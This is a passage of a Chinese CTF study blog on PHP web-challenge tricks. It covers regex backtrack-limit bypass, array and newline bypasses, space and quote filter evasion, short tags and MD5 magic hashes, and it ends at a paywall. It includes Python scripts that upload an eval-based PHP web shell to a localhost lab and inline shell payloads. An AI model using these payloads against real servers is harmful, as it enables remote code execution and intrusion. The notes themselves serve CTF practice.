PHP备赛CTF知识点①–清风

已于 2024-07-10 20:57:04 修改
阅读量1.9k 收藏 59
点赞数 46
分类专栏: CTF 安全渗透 文章标签: php web安全 网络安全
于 2024-07-10 20:43:03 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/weixin_71913298/article/details/140333247
版权

PHP备赛CTF知识点①–清风

1.正则匹配的绕过

正则匹配绕过即===preg_match()函数

------三种方法
(1)最大回溯次数绕过**(仅用于POST)**

PHP 的 pcre.backtrack_limit 限制利用

PHP 为了防止正则表达式的拒绝服务攻击(reDOS),给 pcre 设定了一个回溯次数上限 pcre.backtrack_limit。

PHP 文档中,中英文版本的数值是不一样的:
    中文为10万
    英文为100万

①回溯绕过正则并实现文件上传:

from requests import post,get
from io import BytesIO
url='http://127.0.0.1/openlab/xss/regexp/demo5.php'
files = {
   
    'file': BytesIO(b'aaa<?php eval($_POST[123]);//' +b'a' *1000000)
}
res = post(url,files=files,allow_redirects=False)
print(res.text)

②回溯绕过正则拿flag:

from requests import post,get
payload={
   
    'greeting':'Merry Christmas' +'a' * 1000000
}
res=post('http://127.0.0.1/openlab/xss/regexp/demo2.php',data=payload)
print(res.text)
(2)数组绕过

------php大部分函数无法处理数组,所以想到用数组绕过

例如:greeting[]=Merry Christmas
if(strpos($greeting,'Merry Christmas')!==false){
   

        echo 'Merry Christmas. '.'flag{xxxxxx}';

    #strpos() 是 PHP 中的一个字符串函数,用于查找字符串首次出现的位置
--如果 'Merry Christmas' 存在于 $greeting 中,函数将返回该子字符串首次出现的位置(从 0 开始计数)。
--如果 'Merry Christmas' 不存在于 $greeting 中,函数将返回 false#数组返回值为NULL,成功绕过
(3)换行绕过===%0a
%0a
例如:?action=upload&data=%0a<?eva($_POST["cmd"]);?>

=======================================================

(4)空格过滤 绕过—%09

%09  <  >    <>   ${
   IFS}   $IFS$9

(5) 单引号过滤 绕过—`(反单引号)

echo`你好`;

2.php短标签—<?="1"?>

当php字符串被过滤时,使用短标签===(省去php字符)

注意:

短标签中少了php和分号(;)

正常PHP为:<?php echo"1";?>       
      <?="1"?>       #相当于<?php echo"1";?>
或者   <?echo"1"?>   #上下是相同的,---=相当于echo
或者   <%echo"1"%>   #这种极少用,有的版本行不通

3.MD5绕过

PHP规定当进行字符串与数字的弱比较时,会进行如下步骤

先看字符串开头是否为数字,如果为数字,则截止到连续数字的最后一个数字,即"123abc456"=>123

如果开头不为数字,则判断为false,即0。

    ("aaa123"==0) =>true
    ("123a"==123) =>true
(1).MD5弱类型绕过
①—常规0e绕过(科学计数法)
QNKCDZO
240610708
s878926199a
s155964671a
s214587387a

这些字符串的 md5 值都是 0e 开头ÿ
最低0.47元/天 解锁文章
[网络安全自学篇] 八十四.《Windows黑客编程技术详解》之VS环境配置、基础知识及DLL延迟加载详解(1)
杨秀璋的专栏
06-19 1万+
从这篇文章开始,作者将带着大家来学习《Windows黑客编程技术详解》,其作者是甘迪文老师,推荐大家购买来学习。作者将采用实际编程和图文结合的方式进行分享,并且会进步补充知识点。第篇文章主要包括两部分内容,开发环境(VS、编译设置)、基础技术、运行单实例(互斥对象示例)、DLL延迟加载(skin++换皮肤示例)、资源释放(MFC示例)。希望对您有所帮助~
CTF中Crypty入门必看(密码类,密码学)
墨痕诉清风的博客
11-03 8334
ASCII码大致可以分为三部分组成:第部分是:ASCII非打印控制字符第二部分是:ASCII打印字符;第三部分是:扩展ASCII打印字符。这是ASCII码表具体分析链接。
CTFphp可利用的函数和正则表达式的绕过方法
m0_75066605的博客
03-26 2850
整理的CTFphp可利用的函数和正则表达式的绕过方法
[NISACTF 2022]middlerce-----正则匹配回溯绕过
qq_73767109的博客
06-26 1342
要匹配的第个字符与字符串中的第个进行匹配,如果匹配成功就直匹配下去,直至匹配不成功就到第二个要匹配的字符,如果第二个匹配的字符成功了就直匹配下去,如果不成功就吐出原匹配好的字符串最右边的个字符进行匹配,如果还不成功就继续吐,直至匹配成功才到下个要匹配的字符,但是我们知道,既然前个匹配的字符成功了就肯定不符合下个匹配的字符。2.到a这个字符从后面往前回溯匹配,先吐出个d但匹配不上,继续吐出个s,sd还是与a匹配不上。这个字符表示可以匹配任意的字符,那么按上面说的匹配机制,
python数独伪代码回溯法_数独 #回溯算法 #CTF
weixin_39892565的博客
12-08 472
1. intro:巅峰极客的道逆向刷巅峰极客2020里的rev题fu!kpy,复杂得不行但是看到if d[1][0] != '8' or d[1][7] != '2'和if check(h1) != 45 or check(h2) != 45 or check(h9) != 45这种内容,结合flag相关的部分可以确认是flag{9*9}的数独。# uncompyle6 version 2.11...
Bugkuctf web 前女友
Amire0x的小乐园
05-05 939
老规矩,有新东西就记上记 题目链接 这个有点儿意思,,,,, 打开源码 好了,代码意思比较简单 重点看圈住的代码就好 满足v1v2的值不等但是md5相等 且v3=flag才行 好了,新知识来了 首先是md5()函数漏洞 第种 $_GET['a'] != $_GET['b'] && MD5($_GET['a']) == MD5($_GET['b']) 要让上面的等式成立,a...
CTFPHP7 正则绕过
kelenwait的博客
08-19 2732
题目为ctf webphp正则绕过题 前言:由于长度限制,且不像其他题目告知flag.php的内容, 笔者并没有求出flag,绕过思路可参考,也欢迎ctf大佬指点迷津。 题目如下,解析flag.php中的flag变量 <?php include("flag.php"); if(isset($_GET['code'])){ $code = $_GET['code']; if(strlen($code)>20){ die("Too Long."); }
PHPCTF知识点②--清风
weixin_71913298的博客
08-06 1134
7.PHP代码执行漏洞 8.反序列化 9.PHP异或
Web刷题日记1---清风
weixin_71913298的博客
10-25 1087
然后运行alert(_0x324fcb(0x2d9,0x2c3,0x2db,0x2f3)+'k3r_h0pe_t'+_0xe4a674(0x5a1,0x595,0x59e,0x57c)+'irlfriend}'),!0x00是⼗六进制表示⽅法,是在ascii码中为0的字符,有些函数会将0x00当做结束符,从⽽进⾏⽂件上传的绕过。从源代码中寻找flag,虽然没有找到,但是看见了2028.js文件,发现类似flag的js放控制台运行。进入靶场,比较突兀,点了这个button后,提示flag在附近。
正则表达式语法
艾斯比
09-23 375
. 点号表示任意非换行符 \n 的字符 + 加号表示匹配 1 次或多次, 例如 c+ 表示匹配字母 c 次或者多次 ? 问号表示匹配 0 次或 1 次 * 星号表示匹配 0 次或多次 [] 中括号表示匹配单个字符, 例如 [am] 表示匹配字母 a 或者 m 对于连续的, 可以使用 [a-z] 表示字母从 a 到 z 的任字符, 其他还有 [A-Z] 和 [0-9] [] 开头使用 ^ 表示整个取反, 例如 [^abc] 表示匹配非字符 a 非字符 b 非字符 c 的其他字符 () 小括号表示匹.
CTF PHP代码审计 正则表达式 弱类型比较
baynk的博客
03-22 1057
进来就是PHP正则表达式 这个比较难的地方在于正则表达式里面的符号代表什么含义,网上去找了下资料。 在有了上面那个的基础后就比较容易了,分段来说明。 if ("POST" == $_SERVER['REQUEST_METHOD']) 需要用POST方式提交。 if (0 >= preg_match('/^[[:graph:]]{12,}$/', $password)) { ...
【红日Day6-CTFPHP正则绕过
PZ的博客
01-12 2305
练习记录 复现代码: index.php // index.php <?php include 'flag.php'; if ("POST" == $_SERVER['REQUEST_METHOD']) { $password = $_POST['password']; if (0 >= preg_match('/^[[:graph:]]{12,}$/', $pass...
CTF之MD5相等值不相等
weixin_34080903的博客
07-28 1486
开始以为是要寻找MD5碰撞的例子,后来想了想不应该这么复杂,就发现了PHP有个隐式转换的缺陷,PHP在处理哈希字符串时,会利用”!=”或”==”来对哈希值进行比较,它把每个以”0E”开头的哈希值都解释为0,所以如果两个不同的密码经过哈希以后,其哈希值都是以”0E”开头的,那么PHP将会认为他们相同,都是0。构造例子QNKCDZO240610708当然,安全的比较方法是三个=,也就是“===”。...
CTF-PHP代码审计,正则表达式记录
江湖
06-08 6022
1.flag In the variable ! &lt;?php error_reporting(0); include "flag1.php"; highlight_file(__file__); if(isset($_GET['args'])){ $args = $_GET['args']; if(!preg_match("/^\w+$/",$args)){ ...
发立得信息发布系统房屋信息版(php+mysql)V1.0版
易查薪
06-09 785
个轻量级的房屋信息发布平台,基于PHP和MySQL开发,支持用户发布房屋出售/出租信息,以及后台管理功能。 轻量级适合网站开发PHP方向入门者学习,首发版本,未经实际业务流程检验,仅供学习参考。
IP证书的申请攻略有哪些?有何作用?
qwerdfwc_的博客
06-12 517
IP证书通过SSL/TLS协议对IP地址间的通信进行加密,防止数据在传输过程中被窃取或篡改,适用于API接口、物联网设通信等场景。浏览器地址栏显示HTTPS和锁形图标,消除“不安全”警告,增强用户信任。同时满足PCI DSS、GDPR等法规对数据加密的要求。由权威CA签发的IP证书可验证服务器身份,防止中间人攻击和IP欺骗,确保通信双方的真实性。适用于无域名解析能力的封闭网络、临时加密通信系统(如应急系统)或军事/政府专用网络。
【靶场】upload-labs-文件上传漏洞闯关
qq_44936245的博客
06-12 411
本文记录文件上传漏洞学习,仅供学习用,维护网络安全靠大家
【春秋云镜】CVE-2023-2130漏洞复现exp
m0_74786138的博客
06-09 410
​ 在SourceCodester采购订单管理系统1.0中发现了项被分类为关键的漏洞。受影响的是组件GET参数处理器的文件/admin/suppliers/view_details.php中的个未知函数。对参数id的操纵导致了SQL注入。可以远程发起攻击。影响版本SourceCodester采购订单管理系统 1.0。
wordpress首页调用指定ID页面内的相册
最新发布
jianzhanyes的博客
06-12 344
根据上面的方法,熟悉wordpress朋友可以自行解决问题。如果你需要更具体的实现方式,我可以提供更针对性的解决方案。安装并激活”Shortcode in Widgets”插件(如果需要在小工具中使用)如果使用缓存插件,可能需要清除缓存才能看到效果。确保ID为2的页面确实包含相册短代码()相册的显示样式可能受到主题CSS的影响。方法:使用短代码和自定义查询。修改主题文件前建议先创建子主题。方法二:直接修改首页模板。
ctf知识点表格
03-08
### CTF 知识点汇总 #### 、编码与解码 | 编码/解码方式 | 描述 | | --- | --- | | Rail Fence Cipher | 使用种特殊的栅栏排列方法来加密消息,通过改变字符的位置实现加密效果[^1] | #### 二、工具类资源 | 工具名称 | 功能描述 | | --- | --- | | CyberChef | 提供多种编解码功能以及加密算法的支持,适用于各种数据处理场景;支持本地部署,方便安全研究者使用[^2] | #### 三、Web 前端技术基础 | 技术类别 | 主要内容 | | --- | --- | | HTML/CSS/JS | 构成网页的基础要素,其中HTML负责页面结构定义,CSS用于样式设计,而JavaScript则实现了动态交互逻辑。这些构成了用户可以直接看到并操作的部分——即所谓的“前端”。此外,在某些情况下可以通过Burp Suite等工具捕获HTTP请求并对响应内容进行篡改测试[^3] | #### 四、逆向工程技巧 | 场景应用 | 解决方案建议 | | --- | --- | | 文件解析 | 对于特定格式文件(如图片、音频),除了常规查看外还需注意隐藏信息的存在形式,比如元数据内嵌入的秘密文本或是图像中的不可见像素区域携带的信息。同时也要留意题目设置者的意图,可能需要更加细致地观察细节之处[^4] | #### 五、XSS 攻击分类 | XSS 类型 | 特征说明 | | --- | --- | | 反射型 | 当服务器接收到带有恶意脚本参数的URL访问时会将其反射回客户端浏览器执行 | | 存储型 | 用户提交的内容被保存到数据库或其他持久化存储介质后再由其他用户浏览触发攻击行为 | | DOM型 | 不涉及服务端参与,完全依赖于当前页面上下文中已存在的DOM节点属性变更引发的安全漏洞[^5] | ```python # 示例Python代码片段:检测是否存在简单的XSS注入风险 def check_xss(input_string): dangerous_tags = ['<script>', '</script>'] for tag in dangerous_tags: if tag.lower() in input_string.lower(): return True return False ```
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值